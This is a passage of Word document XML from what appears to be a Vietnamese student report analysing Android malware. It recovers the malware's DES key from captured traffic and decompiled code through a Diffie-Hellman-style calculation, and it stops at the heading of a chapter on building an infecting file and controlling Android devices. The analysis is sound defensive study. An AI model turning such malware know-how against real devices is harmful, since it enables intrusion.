          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     • Máy chủ lắng nghe cổng TCP 443, thường được dành riêng cho HTTPS. Nhưng giao tiếp xảy ra trong HTTP, vì vậy nếu chúng ta muốn đọc nó với Wireshark, chúng ta phải sử dụng tùy chọn Mã giải mã như là tùy chọn và chọn HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6846E" w14:textId="77777777" w:rsidR="00CA0D70" w:rsidRPr="00CA0D70" w:rsidRDefault="00CA0D70" w:rsidP="00CA0D70">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA0D70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     • Tất cả các yêu cầu dường như được mã hóa: không có dữ liệu nhạy cảm nào xuất hiện rõ ràng trong bản chụp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E55470" w14:textId="3B4226C1" w:rsidR="00510570" w:rsidRDefault="00510570" w:rsidP="00510570"/>
    <w:p w14:paraId="73D58676" w14:textId="05691A9D" w:rsidR="00CA0D70" w:rsidRDefault="00CA0D70" w:rsidP="00510570"/>
    <w:p w14:paraId="2C2EAA44" w14:textId="77777777" w:rsidR="00CA0D70" w:rsidRPr="00510570" w:rsidRDefault="00CA0D70" w:rsidP="00510570"/>
    <w:p w14:paraId="109989F6" w14:textId="265B345B" w:rsidR="00372938" w:rsidRDefault="00372938">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc533387048"/>
      <w:r w:rsidRPr="00372938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Mã hóa được sử dụng cho quá trình truyền dữ liệu, mã hóa nào đã được sử </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00372938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>dụng ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00372938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> khóa được sử dụng là gì, Giải thích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F44687" w14:textId="1D4256C0" w:rsidR="00372938" w:rsidRDefault="00372938" w:rsidP="00372938"/>
    <w:p w14:paraId="1506D5F3" w14:textId="42986DDB" w:rsidR="00372938" w:rsidRPr="00D71D9F" w:rsidRDefault="00033C61" w:rsidP="00372938">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Mã hóa DES đã được sử </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dụng .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="157CDD92" w14:textId="77777777" w:rsidR="00033C61" w:rsidRPr="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"># grep -rn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DES .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="724CDAAA" w14:textId="77777777" w:rsidR="00033C61" w:rsidRPr="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./daemon/d/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3:import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> javax.crypto.spec.DESKeySpec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096DA78B" w14:textId="77777777" w:rsidR="00033C61" w:rsidRPr="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./daemon/d/a.java:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5:public</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> final class a extends DESKeySpec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC135AB" w14:textId="77777777" w:rsidR="00033C61" w:rsidRPr="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./daemon/e/a.java:14: SecretKeyFactory localSecretKeyFactory1 = SecretKeyFactory.getInstance("DES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534C779" w14:textId="079EEE65" w:rsidR="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./daemon/e/a.java:29: Cipher localCipher1 = Cipher.getInstance("DES");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C47F8" w14:textId="77777777" w:rsidR="00D71D9F" w:rsidRPr="00033C61" w:rsidRDefault="00D71D9F" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBA5518" w14:textId="1227456C" w:rsidR="00033C61" w:rsidRPr="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Ứ</w:t>
      </w:r>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ng dụng phần mềm độc hại đã tính s = B ^ a mod p.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F4BEA" w14:textId="4CCC0ED1" w:rsidR="00033C61" w:rsidRDefault="0045446A" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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 </w:t>
      </w:r>
      <w:r w:rsidR="00033C61" w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B được tìm thấy trong một gói máy chủ trong pcap, x = 9915D4E8B2F342BEFC3E70C352D78F49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2785EFE9" w14:textId="77777777" w:rsidR="00D71D9F" w:rsidRPr="00033C61" w:rsidRDefault="00D71D9F" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573269FA" w14:textId="569C8CE5" w:rsidR="00033C61" w:rsidRDefault="00033C61" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0045446A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">p được tạo ngẫu nhiên bởi phần mềm độc hại, tìm thấy </w:t>
      </w:r>
      <w:r w:rsidR="00D71D9F" w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00033C61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong pcap, p = 00EABBE22F3A27C63780C932C76B351199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6461CB" w14:textId="77777777" w:rsidR="00D71D9F" w:rsidRPr="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3CB11AFF" w14:textId="29371964" w:rsidR="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00D71D9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã được tìm thấy trong mã, a = 640963485269741EF69AE45D69F23AA9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47645EBC" w14:textId="77777777" w:rsidR="00D71D9F" w:rsidRPr="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00D71D9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E1DB85" w14:textId="5FFBB68D" w:rsidR="00D71D9F" w:rsidRPr="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00D71D9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006C3191">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>au đó có s = B ^ a mod p = 17355c6874cba653c4c9973a45c7007d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF3151" w14:textId="77777777" w:rsidR="00D71D9F" w:rsidRPr="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00D71D9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>8 byte</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuối cùng được sử dụng làm khóa DES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455D472" w14:textId="4C4081F0" w:rsidR="00D71D9F" w:rsidRDefault="00D71D9F" w:rsidP="00033C61">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C5AB54" w14:textId="2476193A" w:rsidR="00D80E7C" w:rsidRPr="00D80E7C" w:rsidRDefault="00D80E7C" w:rsidP="00D80E7C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D80E7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D80E7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Key :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D80E7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D71D9F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c4c9973a45c7007d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D80E7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB3376" w14:textId="77777777" w:rsidR="00033C61" w:rsidRDefault="00033C61" w:rsidP="00372938"/>
    <w:p w14:paraId="406BD296" w14:textId="77777777" w:rsidR="00372938" w:rsidRPr="00372938" w:rsidRDefault="00372938" w:rsidP="00372938"/>
    <w:p w14:paraId="2F91373D" w14:textId="11FB5D45" w:rsidR="00EE1D6A" w:rsidRDefault="00EE1D6A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Chương 3. Tạo file lây nhiễm và điều khiển thiết bị Android</w:t>
      </w:r>
      <w:r w:rsidR="00392A5B" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7335D437" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="002F05F7"/>
    <w:p w14:paraId="674C7DB7" w14:textId="4FD615B4" w:rsidR="00447E87" w:rsidRDefault="00447E87" w:rsidP="00447E87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
